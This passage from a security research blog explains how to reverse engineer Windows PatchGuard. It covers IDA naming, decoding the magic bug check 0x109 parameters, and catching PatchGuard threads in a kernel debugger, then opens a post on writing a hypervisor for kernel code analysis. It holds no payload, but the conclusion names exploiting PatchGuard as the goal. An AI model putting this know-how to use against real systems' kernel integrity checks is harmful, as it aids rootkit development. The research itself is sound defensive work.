<br /></div>
For ease of analysis with IDA, it is worth naming functions in a consistent manner since the number of functions to be analyzed is going to be large. I usually name PatchGuard functions with the prefix Pg_ for ones with symbol names and Pg_x for ones without symbol names. In this case, I name KiFilterFiberContext() as Pg_KiFilterFiberContext(), and sub_1407339C3() as Pg_xKiFilterFiberContextCaller().<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwJdp33CSyA1irYfYC25ywC2EFk-IvF6ciWtBwlYtcfTEmVZa-iSmycL6HyvfVpmevmLZ-4laaoXWkDIE18jqgow642lhRovS9t_f-S-6f-lfrHCu5gZ2P-wOO38iv9Wozq8mO3iEAp30/s1600/4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwJdp33CSyA1irYfYC25ywC2EFk-IvF6ciWtBwlYtcfTEmVZa-iSmycL6HyvfVpmevmLZ-4laaoXWkDIE18jqgow642lhRovS9t_f-S-6f-lfrHCu5gZ2P-wOO38iv9Wozq8mO3iEAp30/s1600/4.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 5: Filtering functions with the prefix</td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
You may also want to use <a href="https://github.com/tandasat/scripts_for_RE/blob/master/parse_x64_SEH.py" target="_blank">parse_x64_SEH.py</a> to discover code flow that uses SEH. With this script, you find that Pg_xKiFilterFiberContextCaller() is an __except expression and that the corresponding __try is in KeInitAmd64SpecificState(). At this point, you can rename Pg_xKiFilterFiberContextCaller() as Pg_xKeInitAmd64SpecificStateExceptionHandler() and KeInitAmd64SpecificState() as Pg_KeInitAmd64SpecificState().<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCiI5NZkIwL664zstJfCNGS4yqY_pPvNbkfaCuP2dR_kQtcZ7UCClLFItR9l9Luyq5SPvX698K9HMsgC3AWGAiNNDciCXfh4jIiLskuh8z_-0Cl4QzTxB3ZTCWtCAf0sbC6iuJkiIL06Y/s1600/5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCiI5NZkIwL664zstJfCNGS4yqY_pPvNbkfaCuP2dR_kQtcZ7UCClLFItR9l9Luyq5SPvX698K9HMsgC3AWGAiNNDciCXfh4jIiLskuh8z_-0Cl4QzTxB3ZTCWtCAf0sbC6iuJkiIL06Y/s1600/5.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 6: Reflected SEH information</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdOh5KGtmy7BGxBT4QqAkF6yL-dOuIKZGhXaO3RpTgi8N7N0HL3ZuZ_ndgL_gqY6hk33_e6_4DWGpMKqzPfeRM9POcyTwSMuFm10inee95E5uYFlv-lgkWsrcQJtJn0yUi_crVW-Mvrys/s1600/6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdOh5KGtmy7BGxBT4QqAkF6yL-dOuIKZGhXaO3RpTgi8N7N0HL3ZuZ_ndgL_gqY6hk33_e6_4DWGpMKqzPfeRM9POcyTwSMuFm10inee95E5uYFlv-lgkWsrcQJtJn0yUi_crVW-Mvrys/s1600/6.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 7: Where the corresponding __try is</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
Similarly, you can repeat the same process against all functions and global variables referenced from each Pg_*() function using the Proximity browser of IDA. This gives you a fairly comprehensive list of Pg_ functions, which can be discouraging enough for most casual reverse engineers ;)<br />
<br />
<h3>
Analyzing 0x109 Crash Dump for Re-constructing the PatchGuard Context</h3>
As soon as you start to read Pg_*() functions, you discover that there are countless indirect calls through specific registers. Those are accesses to the PatchGuard context, and it is essential to know what is stored there and how it is used to understand the internals of PatchGuard. <br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmYUl0QgLXqBZwUNGZTcutD1FDfvEO2eJ0z4Ztp6Potq5Gz9Kb-apAqoRDIfKplxLaWPfoAusKbY2sfJc1Gzy_gEaRUbqxogjlL0Ryws0kA7i5vnPuw8c-Eu-B1YFQU29iqfcrRcJCGAE/s1600/7.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmYUl0QgLXqBZwUNGZTcutD1FDfvEO2eJ0z4Ztp6Potq5Gz9Kb-apAqoRDIfKplxLaWPfoAusKbY2sfJc1Gzy_gEaRUbqxogjlL0Ryws0kA7i5vnPuw8c-Eu-B1YFQU29iqfcrRcJCGAE/s1600/7.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 8: References to the PatchGuard context</td></tr>
</tbody></table>
The most precise way to accomplish this is to read the initialization function (i.e., Pg_xInitializePatchGuard()) for function pointers and the main validation routine (i.e., Pg_FsRtlMdlReadCompleteDevEx()) for variables. Besides static analysis, it is also wise to perform dynamic analysis to get a broad view of the context quickly, especially at the initial stage of analysis.<br />
<br />
There are some difficulties in performing effective run-time analysis, however.<br />
<br />
First of all, you do not know where to monitor at the beginning of analysis since most of the core code is copied onto random memory locations and stored in an encoded form except while it is executing. In addition to that, setting breakpoints or installing hooks in the kernel causes bug check 0x109 unless you know how the integrity check is carried out. Moreover, you may not be able to attach a kernel debugger to a system running on some non-PC devices such as Windows RT and Windows Phone.<br />
<br />
It may sound pretty bad, but the good news is that we can still uncover the contents of the PatchGuard context by analyzing a crash dump. Specifically, you can interpret each 'reserved' bug check parameter in the following ways on x64:<br />
<br />
<ul>
<li>Arg1 - 0xA3A03F5891C8B4E8 = An address of the PatchGuard context</li>
<li>Arg2 - 0xB3B74BDEE4453415 = An address of a validation structure that detected corruption</li>
<li>Arg3 = An address of corrupted data (in most cases)<br /><br />NB: You can easily spot those magic values in Pg_FsRtlMdlReadCompleteDevEx() before a call to Pg_SdbpCheckDll() as well as code setting bug check parameters.</li>
</ul>
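<div>
The subtraction is plain 64-bit unsigned arithmetic that wraps around, so it can also be done outside the debugger. The sketch below uses the two magic values listed above and, as sample input, the Arg1 and Arg2 values from the Windows 10 example that follows. decode_0x109 and kd_format are hypothetical helper names, and the magic values may differ on other builds.</div>

```python
MASK64 = (1 << 64) - 1

# Magic constants quoted in the list above (x64).
CONTEXT_MAGIC = 0xA3A03F5891C8B4E8
VALIDATION_MAGIC = 0xB3B74BDEE4453415


def decode_0x109(arg1: int, arg2: int):
    """Return (context address, validation structure address)."""
    context = (arg1 - CONTEXT_MAGIC) & MASK64
    validation = (arg2 - VALIDATION_MAGIC) & MASK64
    return context, validation


def kd_format(address: int) -> str:
    """Format a 64-bit value the way the kernel debugger prints it."""
    return f"{address >> 32:08x}`{address & 0xFFFFFFFF:08x}"


# Sample values; any Arg1/Arg2 pair from !analyze -v can be substituted.
context, validation = decode_0x109(0xA3A01F597768B4F0, 0xB3B72BDFC9E65CC3)
print(kd_format(context))
print(kd_format(validation))
```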
<br />
<br />
Let us take a look at an example on Windows 10. This is what you get on bug check 0x109:<br />
----<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0: kd> !analyze -v</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">*******************************************************************************</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">* *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">* Bugcheck Analysis *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">* *</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">*******************************************************************************</span><br />
<span style="font-size: x-small;"><span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">CRITICAL_STRUCTURE_CORRUPTION (109)</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Arguments:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Arg1: <span style="color: red;">a3a01f597768b4f0</span>, Reserved</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Arg2: <span style="color: red;">b3b72bdfc9e65cc3</span>, Reserved</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Arg3: fffff80100af8074, Failure type dependent information</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Arg4: 0000000000000001, Type of corrupted region, can be</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">...</span><br />
<div>
----<br />
Then, check the first parameter:<br />
----<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kd> <span style="color: red;">? a3a01f597768b4f0 - 0xA3A03F5891C8B4E8</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Evaluate expression: -35180519620600 = <span style="color: red;">ffffe000`e5a00008</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kd> dps <span style="color: red;">ffffe000`e5a00008</span> l200</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a00008 70047266`b0b8a753</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">...</span><br />
<div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ffffe000`e5a000e0 00000000`00000000</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ffffe000`e5a000e8 fffff801`00453b80 nt!ExAcquireResourceSharedLite</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ffffe000`e5a000f0 fffff801`004537f0 nt!ExAcquireResourceExclusiveLite</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ffffe000`e5a000f8 fffff801`00688930 nt!ExAllocatePoolWithTag</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ffffe000`e5a00100 fffff801`006896d0 nt!ExFreePool</span><span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span><span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">...</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ffffe000`e5a004b8 fffff801`00b850b0 nt!HandleTableListLock</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a004c0 ffffc001`0c614000 <span style="color: blue;">; </span></span><span style="color: blue;"><span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">nt!</span><span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ObpKernelHandleTable</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a004c8 fffff780`00000000 <span style="color: blue;">; </span></span><span style="color: blue;"><span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">nt!</span><span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">KiUserSharedData</span></span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ffffe000`e5a004d0 ff73c402`76affdcd </span><span style="color: blue; font-family: 'Courier New', Courier, monospace; font-size: x-small;">; a copy of nt!KiWaitNever</span></div>
<div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">ffffe000`e5a004d8 fffff801`00b292c0 nt!SeProtectedMapping</span><span style="color: blue; font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span><span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">...</span><br />
<div>
----</div>
<div>
In this example, ffffe000`e5a00008 is an address of the PatchGuard context starting with random-looking bytes followed by a bunch of function pointers and variables. Although you may not tell what some variables are at a glance, defining the PatchGuard structure in IDA with this result is fundamental to uncover how PatchGuard works.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijEgUETc51M9DgrvotLlLWmzswAfrC5Dra2rBHwpuVm8NjXyKDxGo9Z5CTr73NHrrfItBHC1zkTcnv4C06v7oJs2KhyphenhyphenIEs6DWR4wfgsQIfuz8sG2swk0JTvkZcQ8Qe08IgQ2KvJfzSVzw/s1600/8.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijEgUETc51M9DgrvotLlLWmzswAfrC5Dra2rBHwpuVm8NjXyKDxGo9Z5CTr73NHrrfItBHC1zkTcnv4C06v7oJs2KhyphenhyphenIEs6DWR4wfgsQIfuz8sG2swk0JTvkZcQ8Qe08IgQ2KvJfzSVzw/s1600/8.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 9: Defining the structure in IDA</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAPTYo_8Y9K3jv2PjlqJ0UFzBeGiqcl3p9U-eVwXamsSXVzF2RA-Tv92Shs2FgQzehz_sIA946YFazwSP5AmvUthgzdjYolwmE9_Pu5utlsm6lzA4wwLYz8TyUF4yfhX252hHP6CyrHS0/s1600/9.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAPTYo_8Y9K3jv2PjlqJ0UFzBeGiqcl3p9U-eVwXamsSXVzF2RA-Tv92Shs2FgQzehz_sIA946YFazwSP5AmvUthgzdjYolwmE9_Pu5utlsm6lzA4wwLYz8TyUF4yfhX252hHP6CyrHS0/s1600/9.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 10: Applied the structure definition</td></tr>
</tbody></table>
<br />
The second parameter is the address of the validation structure that detected corruption. There are multiple structures, and each corresponds to a type of corrupted region (Arg4). Their formats vary but are mostly made up of at least: the type of corrupted region, the address(es) to verify, and the checksum(s) expected as valid value(s).<br />
<br />
The following is a dump of the structure in this example (I commented with some guesswork):<br />
----<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kd> <span style="color: red;">? b3b72bdfc9e65cc3 - 0xB3B74BDEE4453415 </span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Evaluate expression: -35180519544658 =<span style="color: red;"> ffffe000`e5a128ae</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kd> dps <span style="color: red;">ffffe000`e5a128ae</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a128ae 00000000`00000001 <span style="color: blue;">; type of corrupted region</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a128b6 fffff801`00789000 nt!BcpCursor <PERF> (nt+0x36d000)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span style="color: blue;">; an address of .pdata </span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a128be 244e1425`0004a9e8 <span style="color: blue;">; checksum?, a virtual size of .pdata</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a128c6 fffff801`00789000 nt!BcpCursor <PERF> (nt+0x36d000)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span style="color: blue;">; an address of .pdata </span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a128ce fffff801`0041c000 nt!WerLiveKernelInitSystem <PERF> (nt+0x0)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span style="color: blue;">; an address of nt image base</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a128d6 0004a9e8`00842000 <span style="color: blue;">; a virtual size of .pdata, a size of nt image</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a128de 39e90701`406ebd95 <span style="color: blue;">; checksums?</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe000`e5a128e6 78ca89f0`62a1f735</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><span style="font-size: x-small;">...</span></span><br />
<div>
----<br />
<br />
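<div>
Because dps prints eight bytes at a time, two adjacent 32-bit fields show up fused into one value in the dump above. On little-endian x64 the low half is the field at the lower address. The sketch below splits two of the dumped values that way. split_qword is a hypothetical helper, and what each half means is the same guesswork as in the comments above.</div>

```python
def split_qword(value: int):
    """Split a 64-bit value as printed by dps into (low dword, high dword).

    The low dword is the field stored at the lower address.
    """
    return value & 0xFFFFFFFF, value >> 32


# 244e1425`0004a9e8 from the dump above.
size_low, checksum_high = split_qword(0x244E14250004A9E8)
print(hex(size_low), hex(checksum_high))

# 0004a9e8`00842000 from the dump above.
image_size_low, pdata_size_high = split_qword(0x0004A9E800842000)
print(hex(image_size_low), hex(pdata_size_high))
```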
Those structures are stored at the end of the PatchGuard context as a variable-length array, following other structures and the code that recovers corruption so that the bug check can be issued reliably. They are referenced through fields containing an offset and the number of array entries.<br />
<br />
<h3>
Discovering Threads Executing PatchGuard Code</h3>
Another trick for run-time analysis is discovering threads that are executing code in memory outside any loaded image and setting breakpoints there. It is possible only when you are able to attach a kernel debugger to the system.<br />
<br />
As I mentioned earlier, PatchGuard contexts, including their code, are allocated on memory that is either executable NonPagedPool or independent pages allocated by MmAllocateIndependentPages(). As a result, a thread running that code exhibits an uncommon stack trace.<br />
----<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kd> !process 4 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> THREAD ffffe00137df7040 Cid 0004.0064 Teb: ...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Win32 Start Address nt!ExpWorkerThread (0xfffff803d16ac3f0)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Child-SP RetAddr Call Site</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ffffd001`043ccdb0 fffff803`d1658ab9 nt!KiSwapContext+0x76</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ffffd001`043ccef0 fffff803`d1657fb8 nt!KiSwapThread+0x689</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ffffd001`043ccfb0 fffff803`d1621d0c nt!KiCommitThreadWait+0x148</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ffffd001`043cd040 ffffe001`37ede587 nt!KeDelayExecutionThread+0x1dc</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ffffd001`043cd0b0 4c91448e`dcd4c0fd <span style="color: red;">0xffffe001`37ede587</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ffffd001`043cd0b8 00000000`00000000 <span style="color: red;">0x4c91448e`dcd4c0fd</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">...</span><br />
----<br />
From this output, you can see that thread 0x64 is calling KeDelayExecutionThread() from somewhere outside any image. That is obviously uncommon unless you have malware on your system, especially since the thread is a shared worker thread and not even a dedicated one.<br />
<br />
Once you find a thread like this, you can set a breakpoint at the return address and take control with the debugger.<br />
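The check itself (does a return address fall outside every loaded image?) is simple enough to express in code. The following is only a minimal user-mode sketch under stated assumptions: the ImageRange type and both function names are hypothetical, the image ranges would have to come from the debugger's module list, and none of this is part of Windbg or PatchGuard.<br />

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical description of one loaded image (kernel or driver). */
typedef struct {
    uint64_t base;  /* address of the first byte of the image */
    uint64_t size;  /* size of the image in bytes */
} ImageRange;

/* Returns 1 when addr lies inside one of the given images, 0 otherwise. */
int is_in_any_image(uint64_t addr, const ImageRange *images, size_t count)
{
    assert(images != NULL || count == 0);
    for (size_t i = 0; i < count; ++i) {
        if (addr >= images[i].base && addr - images[i].base < images[i].size) {
            return 1;
        }
    }
    return 0;
}

/* Returns the index of the first non-zero return address that is outside
 * every image, or -1 when all frames return into known images. */
int find_first_non_image_frame(const uint64_t *ret_addrs, size_t frames,
                               const ImageRange *images, size_t count)
{
    assert(ret_addrs != NULL || frames == 0);
    for (size_t i = 0; i < frames; ++i) {
        if (ret_addrs[i] != 0 && !is_in_any_image(ret_addrs[i], images, count)) {
            return (int)i;
        }
    }
    return -1;
}
```

Fed with the RetAddr column of the stack trace above and a range covering nt, the first frame flagged would be the one returning to 0xffffe001`37ede587, which is the address the breakpoint is set on.<br />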
<div>
----</div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kd> u </span><span style="color: red; font-family: 'Courier New', Courier, monospace; font-size: x-small;">0xffffe001`37ede587</span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede587 jmp ffffe001`37ede5b5</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede589 lea rax,[rbp+1A8h]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede590 xor r9d,r9d</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede593 xor r8d,r8d</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede596 mov qword ptr [rsp+20h],rax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede59b mov rcx,r13</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede59e call qword ptr [rbp+68h]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede5a1 test eax,eax</span></div>
</div>
</div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kd> bp </span><span style="color: red; font-family: 'Courier New', Courier, monospace; font-size: x-small;">0xffffe001`37ede587</span><br />
<div>
----</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8zFcO03vUqjM1wbzYANlb81XyE5snEdnKS7LVD55YJ9Pgzroe838OvNXBrMqHTlq1k0-lse9sk4HlBLay7YFyqAtuhOX5VTvmtI4p-Scrcwym4fTvkyR1B_8BeqXEAYXFegHSKqVdOr0/s1600/11.png" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8zFcO03vUqjM1wbzYANlb81XyE5snEdnKS7LVD55YJ9Pgzroe838OvNXBrMqHTlq1k0-lse9sk4HlBLay7YFyqAtuhOX5VTvmtI4p-Scrcwym4fTvkyR1B_8BeqXEAYXFegHSKqVdOr0/s1600/11.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 11: Woohoo! Enjoy debugging.</td></tr>
</tbody></table>
This trick does not always work. PatchGuard sometimes skips the sleep functions (KeDelayExecutionThread() or KeWaitForSingleObject()), so you never catch a thread while it is executing code outside an image, and sometimes it runs inside ntoskrnl.exe rather than from pool. Still, it is worth rebooting a few times and checking whether such threads exist.<br />
<br />
Note that if you want to read the code around the return address in IDA, you can search for the byte sequence at the return address with [Alt-B]. <br />
----<br />
<div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kd> db 0xffffe001`37ede587 l10</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ffffe001`37ede587 <span style="color: red;">eb 2c 48 8d 85 a8 01 00-00 45 33 c9 45 33 c0 48</span> .,H......E3.E3.H</span></div>
</div>
<div>
----</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifEo-ylEk8rNfw6a-3HqXt8PgRY7xTbdbG-yBdJeaIm05nj2BnleA7HGvyCstxu172sKiZfEVJ9dlUebXLbuQsEQJ2cExZvtNsvPizQ7-O8Wzg5wqxk7J8GZ4naUsoaVfNzCxW1AIlduQ/s1600/10.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifEo-ylEk8rNfw6a-3HqXt8PgRY7xTbdbG-yBdJeaIm05nj2BnleA7HGvyCstxu172sKiZfEVJ9dlUebXLbuQsEQJ2cExZvtNsvPizQ7-O8Wzg5wqxk7J8GZ4naUsoaVfNzCxW1AIlduQ/s1600/10.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 12: Finding where the PatchGuard context is running in IDA </td></tr>
</tbody></table>
<br />
Another option is using a hypervisor to monitor and detect PatchGuard threads based on execution of some uncommon instructions if the system is running on the Intel platform. See my PoC <a href="https://github.com/tandasat/Sushi" target="_blank">Sushi</a> as an example.<br />
<br />
<h3>
Conclusion</h3>
We have seen how to locate functions, how to read the parameters of bug check 0x109, and how to discover threads running PatchGuard code. That is pretty much everything you need to know to get started. You are now ready to analyze PatchGuard on Windows 10, where no one has succeeded in exploitation yet (at the time I wrote this article). All you have to do is read code, name fields and functions, and test whether your analysis is correct. None of that is anything special for us.<br />
<br />
<h3>
Special Thanks</h3>
Thank you very much, <a href="https://twitter.com/Myriachan">@Myriachan</a>, for providing me with many details about Windows RT and the opportunity to work on this fun project.<br />
<br /></div>
</div>
</div>
</div>
</div>
Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com0tag:blogger.com,1999:blog-2937860723034111347.post-23148599526617540122015-08-08T10:18:00.003-07:002015-11-01T17:22:34.794-08:00Writing a Hypervisor for Kernel Mode Code Analysis and Fun<div>
In this entry, I am going to share some tips for developing your own hypervisor using VMware Workstation and briefly introduce a sample ring-1 monitoring tool based on a homemade hypervisor. This entry may not be for you if you already have a hypervisor you can modify at will, or if you are not interested in development at all. </div>
<div>
<br />
<h3>
Motivation</h3>
</div>
You know that hypervisors are helpful for dynamic analysis, and most of you use them in some form. However, I guess that not many researchers have written one themselves, perhaps because it sounds challenging, even though it can be quite handy and fun to have a ring-1 monitoring tool you can modify however you want. You may, for example, want to detect and monitor <strike>PatchGuard contexts</strike> a piece of kernel mode code that relocates itself to a random memory location and performs some uncommon operations, such as disabling write protection by modifying CR0, clearing hardware breakpoints by resetting DR7, and accessing IDTR with the SIDT and LIDT instructions. Without a hypervisor, you cannot detect any of those operations because they are just instructions, and you do not know where to set breakpoints because of the periodic relocation. A hypervisor, however, lets you do exactly that.<br />
<div>
<div>
<br /></div>
<div>
Now, you may wonder why you want to write your own hypervisors even though there are quite a few open source projects you could re-purpose. The reason is "it sounds better if you say that you wrote your own hypervisor from scratch." ;) Besides, reading full-fledged hypervisors may not be as enjoyable as writing your own code. Let us see how you can do it.<br />
<br /></div>
<div>
<h3>
What You Need</h3>
</div>
</div>
<div>
You need VMware Workstation as a test environment. It supports nested virtualization (emulation of VT-x) and lets you debug your hypervisor code from the host Windows through Windbg in exactly the same manner as regular kernel debugging.<br />
<br />
You may also be able to use other VMware products that support nested virtualization, such as Fusion, but you will have to configure kernel debugging between two VMs, which is not the most straightforward setup. Also, having Windows as a host lets you use <a href="http://virtualkd.sysprogs.org/" target="_blank">VirtualKD</a>, which makes communication between the debuggee and the debugger very fast. VirtualBox, unfortunately, did not support nested virtualization at the time of writing, so VMX operations cannot be executed inside it. </div>
<div>
<br /></div>
<div>
If you are paranoid and do not trust software-emulated VT-x, you could use a real box with a serial port (which means it is not going to be a laptop) as the debuggee. You might already know that kernel debugging through USB is possible. DO NOT GO THERE unless you already have hardware that is confirmed to support USB debugging. There are some subtle requirements, and you cannot tell whether a device qualifies as a debuggee just by looking at the specs online. Besides, being able to take snapshots and memory dumps from a hung machine with VMware drastically speeds up your development.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
